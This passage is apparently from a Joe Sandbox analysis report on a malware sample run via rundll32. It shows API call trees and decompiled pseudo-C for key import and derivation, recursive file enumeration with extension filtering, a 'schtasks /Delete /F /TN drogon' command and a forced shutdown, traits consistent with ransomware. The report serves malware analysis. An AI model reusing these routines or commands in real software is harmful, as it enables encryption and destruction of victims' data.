                                                                                                                                                                                          • Part of subcall function 007B5613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 007B56B5
                                                                                                                                                                                          • Part of subcall function 007B5613: LocalFree.KERNEL32(00000000), ref: 007B56BF
                                                                                                                                                                                          • Part of subcall function 007B5613: LocalFree.KERNEL32(?), ref: 007B56C8
                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 007B633F
                                                                                                                                                                                          • Part of subcall function 007B6085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60A6
                                                                                                                                                                                          • Part of subcall function 007B6085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60BA
                                                                                                                                                                                          • Part of subcall function 007B6085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,007B62E0,?,?,?,?), ref: 007B60D3
                                                                                                                                                                                          • Part of subcall function 007B6085: CryptDestroyHash.ADVAPI32(?,?,?,?,007B62E0,?,?,?,?), ref: 007B60DF
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 007B6336
                                                                                                                                                                                          • Part of subcall function 007B6246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6260
                                                                                                                                                                                          • Part of subcall function 007B6246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6273
                                                                                                                                                                                          • Part of subcall function 007B6246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6289
                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 007B62F7
                                                                                                                                                                                          • Part of subcall function 007B5E9F: PathCombineW.SHLWAPI(?,?,007C1554,?,?), ref: 007B5EC8
                                                                                                                                                                                          • Part of subcall function 007B5E9F: FindFirstFileW.KERNELBASE(?,?), ref: 007B5EE3
                                                                                                                                                                                          • Part of subcall function 007B5E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B5F09
                                                                                                                                                                                          • Part of subcall function 007B5E9F: PathCombineW.SHLWAPI(?,?,?), ref: 007B5FB1
                                                                                                                                                                                          • Part of subcall function 007B5E9F: StrStrIW.SHLWAPI(?,007C3014), ref: 007B5FE9
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 007B6312
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007B6319
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 007B6322
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 007B632D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2692407486-0
                                                                                                                                                                                        • Opcode ID: 2b531e9f1c1ec3c5dcb0fb60521632810f211ae8c3ddc9f4e3a7092ee06591e6
                                                                                                                                                                                        • Instruction ID: 5d8b3e610f0801a77e50cf26e95e1280ebeb25f6ea165b327c8635504b45ce02
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b531e9f1c1ec3c5dcb0fb60521632810f211ae8c3ddc9f4e3a7092ee06591e6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 09215E71100608AFE7216BA1ED88FEB7BADFF08351B044529FB4282461EB7DEC418B24
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5636
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 007B564C
                                                                                                                                                                                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5662
                                                                                                                                                                                        • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B5682
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007B568D
                                                                                                                                                                                        • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B56A6
                                                                                                                                                                                        • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 007B56B5
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 007B56BF
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B56C8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3940947887-0
                                                                                                                                                                                        • Opcode ID: 7ccf3d7702bfa83516a16d3779525ecb1ed0d2d8f03e15dde7a2e1c7a2fc66cf
                                                                                                                                                                                        • Instruction ID: 9ee601801677e41edf13dd66acf0e69a51c8c373dbd22770ef98086a246fb61c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ccf3d7702bfa83516a16d3779525ecb1ed0d2d8f03e15dde7a2e1c7a2fc66cf
                                                                                                                                                                                        • Instruction Fuzzy Hash: 46212A7650121CBBDB219F968C45FEFBF7DEF09BA4F008011FA08A61A0D6759E11DBA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                        			E007B5E9F(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v532;
                                                                                                                                                                                        				short _v1052;
                                                                                                                                                                                        				short _v1060;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v1644;
                                                                                                                                                                                        				void* _v1648;
                                                                                                                                                                                        				signed int _v1652;
                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                        				long _t52;
                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                        				int _t55;
                                                                                                                                                                                        				intOrPtr* _t56;
                                                                                                                                                                                        				WCHAR* _t61;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				WCHAR** _t69;
                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                        				intOrPtr* _t74;
                                                                                                                                                                                        				intOrPtr* _t75;
                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                        				intOrPtr _t83;
                                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                        				WCHAR* _t114;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t93 = (_t91 & 0xfffffff8) - 0x668;
                                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                                        					L39:
                                                                                                                                                                                        					return _t44;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t44 = PathCombineW( &_v524, _a4, "*");
                                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t44 = FindFirstFileW( &_v532,  &_v1644); // executed
                                                                                                                                                                                        				_v1648 = _t44;
                                                                                                                                                                                        				if(_t44 == 0xffffffff) {
                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					L3:
                                                                                                                                                                                        					_t52 = WaitForMultipleObjects((0 |  *((intOrPtr*)(_a12 + 0x4c)) != 0x00000000) + 1, _a12 + 0x48, 0, 0);
                                                                                                                                                                                        					if(_t52 == 0 || _t52 == 1 || _t52 == 0xffffffff) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t73 = ".";
                                                                                                                                                                                        					_t53 =  &(_v1644.cFileName);
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t79 =  *_t53;
                                                                                                                                                                                        						if(_t79 !=  *_t73) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t79 == 0) {
                                                                                                                                                                                        							L11:
                                                                                                                                                                                        							_t53 = 0;
                                                                                                                                                                                        							L13:
                                                                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                                                                        								L37:
                                                                                                                                                                                        								_t55 = FindNextFileW(_v1648,  &_v1644); // executed
                                                                                                                                                                                        								if(_t55 != 0) {
                                                                                                                                                                                        									goto L3;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L38;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t74 = L"..";
                                                                                                                                                                                        							_t56 =  &(_v1644.cFileName);
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_t80 =  *_t56;
                                                                                                                                                                                        								if(_t80 !=  *_t74) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                        									L19:
                                                                                                                                                                                        									_t56 = 0;
                                                                                                                                                                                        									L21:
                                                                                                                                                                                        									if(_t56 != 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0) {
                                                                                                                                                                                        										if((_v1652 & 0x00000010) == 0 || (_v1652 & 0x00000400) != 0) {
                                                                                                                                                                                        											_t61 = PathFindExtensionW( &(_v1644.dwReserved0));
                                                                                                                                                                                        											_t75 =  &(_v1644.dwReserved0);
                                                                                                                                                                                        											_t81 = _t75 + 2;
                                                                                                                                                                                        											do {
                                                                                                                                                                                        												_t89 =  *_t75;
                                                                                                                                                                                        												_t75 = _t75 + 2;
                                                                                                                                                                                        											} while (_t89 != 0);
                                                                                                                                                                                        											if(_t61 == _t93 + 0x3c + (_t75 - _t81 >> 1) * 2) {
                                                                                                                                                                                        												_t62 = 0;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t62 = E007B59B1(_t61);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											if(_t62 != 0) {
                                                                                                                                                                                        												E007B5D0A(_t81,  &_v1060, _a12); // executed
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t90 = 0;
                                                                                                                                                                                        											_t114 =  *0x7c3014; // 0x7c1528
                                                                                                                                                                                        											if(_t114 == 0) {
                                                                                                                                                                                        												L29:
                                                                                                                                                                                        												E007B5E9F( &_v1060, _a8 - 1, _a12); // executed
                                                                                                                                                                                        												goto L37;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t69 = 0x7c3014;
                                                                                                                                                                                        											while(StrStrIW( &_v1060,  *_t69) == 0) {
                                                                                                                                                                                        												_t90 = _t90 + 1;
                                                                                                                                                                                        												_t69 =  &(0x7c3014[_t90]);
                                                                                                                                                                                        												if( *_t69 != 0) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L29;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t82 =  *((intOrPtr*)(_t56 + 2));
                                                                                                                                                                                        								_t17 = _t74 + 2; // 0x2e
                                                                                                                                                                                        								if(_t82 !=  *_t17) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t56 = _t56 + 4;
                                                                                                                                                                                        								_t74 = _t74 + 4;
                                                                                                                                                                                        								if(_t82 != 0) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                                        							asm("sbb eax, 0xffffffff");
                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t83 =  *((intOrPtr*)(_t53 + 2));
                                                                                                                                                                                        						_t14 = _t73 + 2; // 0x650000
                                                                                                                                                                                        						if(_t83 !=  *_t14) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t53 = _t53 + 4;
                                                                                                                                                                                        						_t73 = _t73 + 4;
                                                                                                                                                                                        						if(_t83 != 0) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                                        					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L38:
                                                                                                                                                                                        				_t44 = FindClose(_v1648); // executed
                                                                                                                                                                                        				goto L39;
                                                                                                                                                                                        			}































                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b606d
                                                                                                                                                                                        0x007b5f65
                                                                                                                                                                                        0x007b5f6a
                                                                                                                                                                                        0x007b5f6e
                                                                                                                                                                                        0x007b5f6e
                                                                                                                                                                                        0x007b5f74
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f79
                                                                                                                                                                                        0x007b5f90
                                                                                                                                                                                        0x007b5f90
                                                                                                                                                                                        0x007b5f99
                                                                                                                                                                                        0x007b5f9b
                                                                                                                                                                                        0x007b5fc4
                                                                                                                                                                                        0x007b601b
                                                                                                                                                                                        0x007b6021
                                                                                                                                                                                        0x007b6025
                                                                                                                                                                                        0x007b6028
                                                                                                                                                                                        0x007b6028
                                                                                                                                                                                        0x007b602b
                                                                                                                                                                                        0x007b602e
                                                                                                                                                                                        0x007b603d
                                                                                                                                                                                        0x007b6046
                                                                                                                                                                                        0x007b603f
                                                                                                                                                                                        0x007b603f
                                                                                                                                                                                        0x007b603f
                                                                                                                                                                                        0x007b604a
                                                                                                                                                                                        0x007b6057
                                                                                                                                                                                        0x007b6057
                                                                                                                                                                                        0x007b5fd0
                                                                                                                                                                                        0x007b5fd0
                                                                                                                                                                                        0x007b5fd2
                                                                                                                                                                                        0x007b5fd8
                                                                                                                                                                                        0x007b5fff
                                                                                                                                                                                        0x007b600f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b600f
                                                                                                                                                                                        0x007b5fda
                                                                                                                                                                                        0x007b5fdf
                                                                                                                                                                                        0x007b5ff3
                                                                                                                                                                                        0x007b5ff4
                                                                                                                                                                                        0x007b5ffd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5ffd
                                                                                                                                                                                        0x007b5fdf
                                                                                                                                                                                        0x007b5fc4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f9b
                                                                                                                                                                                        0x007b5f7b
                                                                                                                                                                                        0x007b5f7f
                                                                                                                                                                                        0x007b5f83
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f85
                                                                                                                                                                                        0x007b5f88
                                                                                                                                                                                        0x007b5f8e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f8e
                                                                                                                                                                                        0x007b5f94
                                                                                                                                                                                        0x007b5f96
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f96
                                                                                                                                                                                        0x007b5f3f
                                                                                                                                                                                        0x007b5f43
                                                                                                                                                                                        0x007b5f47
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f49
                                                                                                                                                                                        0x007b5f4c
                                                                                                                                                                                        0x007b5f52
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f52
                                                                                                                                                                                        0x007b5f58
                                                                                                                                                                                        0x007b5f5a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b5f5a
                                                                                                                                                                                        0x007b6073
                                                                                                                                                                                        0x007b6077
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathCombineW.SHLWAPI(?,?,007C1554,?,?), ref: 007B5EC8
                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 007B5EE3
                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B5F09
                                                                                                                                                                                        • PathCombineW.SHLWAPI(?,?,?), ref: 007B5FB1
                                                                                                                                                                                        • StrStrIW.SHLWAPI(?,007C3014), ref: 007B5FE9
                                                                                                                                                                                        • PathFindExtensionW.SHLWAPI(?), ref: 007B601B
                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,?), ref: 007B6065
                                                                                                                                                                                        • FindClose.KERNELBASE(?), ref: 007B6077
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1251538951-0
                                                                                                                                                                                        • Opcode ID: fcb8f0940adec1c777e0ecda110225f7b359abdb33b230b552cb673bb5eb68ae
                                                                                                                                                                                        • Instruction ID: 2608aeb5886cab701b343835a4128f15769754885ece00840250795d5a9746da
                                                                                                                                                                                        • Opcode Fuzzy Hash: fcb8f0940adec1c777e0ecda110225f7b359abdb33b230b552cb673bb5eb68ae
                                                                                                                                                                                        • Instruction Fuzzy Hash: AE51AE311046469EDB31AF24CC48FFAB3AAEB94714F944A29F652C60A4F73ECA45CB51
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E007B8A23() {
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t4 = E007B808E(); // executed
                                                                                                                                                                                        				if(( *0x7c7bc0 & 0x00000002) != 0) {
                                                                                                                                                                                        					_t4 = E007B7FB7(L"schtasks /Delete /F /TN drogon", 0); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(( *0x7c7bc0 & 0x00000001) != 0) {
                                                                                                                                                                                        					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000); // executed
                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                        						ExitWindowsEx(6, 0); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				ExitProcess(0);
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80BC
                                                                                                                                                                                          • Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80CC
                                                                                                                                                                                          • Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80DC
                                                                                                                                                                                          • Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80EC
                                                                                                                                                                                          • Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B8126
                                                                                                                                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 007B8A54
                                                                                                                                                                                        • ExitWindowsEx.USER32(00000006,00000000), ref: 007B8A61
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B8A68
                                                                                                                                                                                          • Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
                                                                                                                                                                                          • Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
                                                                                                                                                                                          • Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
                                                                                                                                                                                          • Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • schtasks /Delete /F /TN drogon, xrefs: 007B8A35
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                                                                                                                                        • String ID: schtasks /Delete /F /TN drogon
                                                                                                                                                                                        • API String ID: 3579268615-951750757
                                                                                                                                                                                        • Opcode ID: 40779f949c6f821a37efedbb6eec2266246e85991903bba576a9190627dacbd8
                                                                                                                                                                                        • Instruction ID: 3913384c8d3f4fb9a9208464ee51be605fbb187f722ff680554c3a19d2a63093
                                                                                                                                                                                        • Opcode Fuzzy Hash: 40779f949c6f821a37efedbb6eec2266246e85991903bba576a9190627dacbd8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AE04F20156260B5E27567215C0EFDB2E4DEF13794F04C208F944A00A59F9D4941C5BE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                        			E007B9016() {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				int _t57;
                                                                                                                                                                                        				struct HINSTANCE__* _t60;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				long _t66;
                                                                                                                                                                                        				intOrPtr* _t70;
                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                        				signed int* _t85;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t71 =  *0x7c7b98;
                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        				_t48 =  *((intOrPtr*)(_t71 + 0x3c)) + _t71;
                                                                                                                                                                                        				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
                                                                                                                                                                                        				if(_t70 != 0) {
                                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        					_t77 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                                                        					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                                                        					_v16 = _t82;
                                                                                                                                                                                        					if(_t77 > 0) {
                                                                                                                                                                                        						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
                                                                                                                                                                                        						_v20 = _t66;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t75 =  *((intOrPtr*)(_t82 + 0xc));
                                                                                                                                                                                        							if(_t66 < _t75) {
                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_v24 =  *(_t82 + 8) + _t75;
                                                                                                                                                                                        								_t66 = _v20;
                                                                                                                                                                                        								if(_t66 >= _v24) {
                                                                                                                                                                                        									goto L5;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                        							L5:
                                                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                                                        							_t82 = _t82 + 0x28;
                                                                                                                                                                                        							_v16 = _t82;
                                                                                                                                                                                        						} while (_v12 < _t77);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
                                                                                                                                                                                        					if(_t53 != 0) {
                                                                                                                                                                                        						_v8 = 1;
                                                                                                                                                                                        						if( *_t70 == 0) {
                                                                                                                                                                                        							L22:
                                                                                                                                                                                        							_t57 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x7c7b98,  *(_t82 + 8), _v20,  &_v20); // executed
                                                                                                                                                                                        							_v8 = _t57;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							while(_v8 == 1) {
                                                                                                                                                                                        								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x7c7b98); // executed
                                                                                                                                                                                        								_v12 = _t60;
                                                                                                                                                                                        								if(_t60 == 0) {
                                                                                                                                                                                        									_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t61 =  *0x7c7b98;
                                                                                                                                                                                        									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
                                                                                                                                                                                        									_t80 =  *_t70 + _t61;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										_t62 =  *_t80;
                                                                                                                                                                                        										if(_t62 == 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										if(_v8 == 1) {
                                                                                                                                                                                        											_t73 = _t62 & 0x7fffffff;
                                                                                                                                                                                        											if(_t73 != _t62) {
                                                                                                                                                                                        												_push(_t73);
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_push( *0x7c7b98 + _t73 + 2);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t63 = GetProcAddress(_v12, ??); // executed
                                                                                                                                                                                        											 *_t85 = _t63;
                                                                                                                                                                                        											if(_t63 == 0) {
                                                                                                                                                                                        												_v8 = _v8 & _t63;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t85 =  &(_t85[1]);
                                                                                                                                                                                        											_t80 =  &(_t80[1]);
